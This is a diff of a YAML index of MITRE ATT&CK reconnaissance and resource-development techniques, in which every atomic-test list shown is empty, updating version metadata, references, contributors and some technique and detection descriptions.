-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -54563,11 +55223,14 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.004:
     technique:
@@ -54625,17 +55288,18 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.006:
     technique:
-      modified: '2023-03-13T20:35:52.302Z'
+      modified: '2024-08-14T15:03:56.383Z'
       name: SEO Poisoning
       description: |-
         Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
 
         To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
 
+        In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
         Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
 
         SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
@@ -54643,7 +55307,7 @@ resource-development:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Vijay Lalwani
       - Will Thomas, Equinix Threat Analysis Center (ETAC)
       - Will Jolliffe
@@ -54657,7 +55321,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -54690,11 +55354,18 @@ resource-development:
         description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
           September 30, 2022.
         url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+      - source_name: Chexmarx-seo
+        description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+          the Star Ranking Game. Retrieved June 18, 2024.'
+        url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+      - source_name: Checkmarx-oss-seo
+        description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+          Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+        url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.003:
     technique:
@@ -54716,7 +55387,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:19:50.018Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -54734,47 +55405,10 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
-      type: attack-pattern
-      created: '2020-10-01T01:30:00.877Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1587
-        url: https://attack.mitre.org/techniques/T1587
-      - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
-        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
-          Units. Retrieved July 18, 2016.
-        source_name: Mandiant APT1
-      - source_name: Kaspersky Sofacy
-        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
-          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
-          December 10, 2015.
-        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
-      - source_name: Bitdefender StrongPity June 2020
-        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
-        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
-          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
-      - source_name: Talos Promethium June 2020
-        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
-        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
-          reach with StrongPity3 APT. Retrieved July 20, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:31:17.270Z'
       name: Develop Capabilities
       description: |-
         Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
@@ -54783,21 +55417,57 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
 
         Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+      created: '2020-10-01T01:30:00.877Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1587
+        external_id: T1587
+      - source_name: Kaspersky Sofacy
+        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+          December 10, 2015.
+        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Mandiant APT1
+        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+          Units. Retrieved July 18, 2016.
+        url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+      - source_name: Talos Promethium June 2020
+        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+          reach with StrongPity3 APT. Retrieved July 20, 2020.
+        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+      - source_name: Bitdefender StrongPity June 2020
+        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1588.005:
     technique:
@@ -54837,7 +55507,7 @@ resource-development:
         description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
           Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
           October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:14:01.255Z'
       name: Exploits
       description: |-
         Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
@@ -54856,15 +55526,13 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.001:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-24T15:10:40.270Z'
       name: Domains
       description: |-
-        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
 
         Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
 
@@ -54872,19 +55540,19 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Jeremy Galloway
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.3'
-      x_mitre_contributors:
-      - Jeremy Galloway
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -54918,55 +55586,64 @@ resource-development:
         url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 reconnaissance:
   T1592:
     technique:
-      x_mitre_platforms:
-      - PRE
+      modified: '2024-10-03T19:35:07.269Z'
+      name: Gather Victim Host Information
+      description: |-
+        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: reconnaissance
+      x_mitre_contributors:
+      - Sam Seabrook, Duke Energy
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Internet Scan: Response Content'
       type: attack-pattern
+      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
       created: '2020-10-02T16:39:33.966Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1592
         url: https://attack.mitre.org/techniques/T1592
+        external_id: T1592
       - source_name: ATT ScanBox
-        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+      - source_name: TrellixQakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved August 1, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Gather Victim Host Information
-      description: |-
-        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
-        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: reconnaissance
-      x_mitre_detection: |-
-        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
-        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.1'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1596.003:
     technique:
@@ -54991,7 +55668,7 @@ reconnaissance:
         url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
         description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
           from Server (Site URL). Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:48:37.628Z'
       name: Digital Certificates
       description: |-
         Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
@@ -55007,8 +55684,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.002:
     technique:
@@ -55030,7 +55705,7 @@ reconnaissance:
         url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
         description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
           73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:44:43.900Z'
       name: Purchase Technical Data
       description: |-
         Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -55046,8 +55721,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.005:
     technique:
@@ -55075,7 +55748,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:05.302Z'
       name: IP Addresses
       description: |-
         Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -55091,33 +55764,33 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.002:
     technique:
-      modified: '2022-10-21T14:32:48.393Z'
+      modified: '2024-11-11T16:13:02.196Z'
       name: DNS
       description: |-
-        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
 
         Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
       created: '2020-10-02T15:47:10.102Z'
@@ -55131,18 +55804,29 @@ reconnaissance:
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
         url: https://www.circl.lu/services/passive-dns/
+      - source_name: DNS-CISA
+        description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+          Leak Domain Information. Retrieved June 5, 2024.
+        url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
       - source_name: DNS Dumpster
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
         url: https://dnsdumpster.com/
+      - source_name: Alexa-dns
+        description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+          June 5, 2024.
+        url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
       - source_name: Sean Metcalf Twitter DNS Records
         description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
-          May 27, 2022.
-        url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+          September 12, 2024.
+        url: https://x.com/PyroTek3/status/1126487227712921600
+      - source_name: Trails-DNS
+        description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+          the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+        url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.002:
     technique:
@@ -55163,7 +55847,7 @@ reconnaissance:
       - source_name: WHOIS
         url: https://www.whois.net/
         description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:50:44.113Z'
       name: WHOIS
       description: |-
         Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -55179,39 +55863,37 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1594:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
-      type: attack-pattern
-      created: '2020-10-02T16:51:50.306Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1594
-        url: https://attack.mitre.org/techniques/T1594
-      - source_name: Comparitech Leak
-        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
-        description: Bischoff, P. (2020, October 15). Broadvoice database of more
